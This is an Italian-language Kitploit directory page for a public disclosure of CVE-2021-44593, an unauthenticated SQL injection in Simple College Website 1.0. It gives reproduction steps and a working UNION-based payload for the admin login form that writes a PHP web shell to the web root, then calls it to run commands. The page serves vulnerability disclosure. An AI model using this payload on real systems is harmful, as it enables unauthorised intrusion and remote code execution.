Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44593 — Divulgazione pubblica e writeup di CVE-2021-44593, una SQL injection non autenticata in Simple College Website che porta a caricamento arbitrario di file ed esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/mister-joe/cve-2021-44593
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

Divulgazione pubblica e writeup di CVE-2021-44593, una SQL injection non autenticata in Simple College Website che porta a caricamento arbitrario di file ed esecuzione remota di codice.

Vedi Repository
24 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44593

Divulgazione pubblica di CVE-2021-44593. Una vulnerabilità di SQL injection/caricamento arbitrario di file/esecuzione di codice remoto in Simple College Website.

DESCRIZIONE

Simple College Website 1.0 è vulnerabile a una SQL injection non autenticata basata su UNION nel parametro "username" della pagina /admin/login.php, che può poi essere sfruttata per caricare file arbitrari e ottenere l'esecuzione di codice remoto.

COMPONENTI INTERESSATI

La funzione login() in admin_class.php

PASSAGGI PER LA RIPRODUZIONE

  1. Accedere alla pagina di login dell'amministratore (di solito /admin/login.php)
  2. Inviare il modulo di login con il parametro POST "username" contenente la seguente SQL injection basata su UNION:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. Navigare a /testing.php?cmd=id

NOTE

  1. È necessaria la conoscenza della posizione della directory root del server web.
  2. Potrebbe essere necessaria anche la conoscenza della posizione della directory root dei documenti se non è la stessa della directory root del server web.
  3. Inoltre, il demone MySQL deve avere i permessi di scrittura per tale directory.
Scarica lo strumento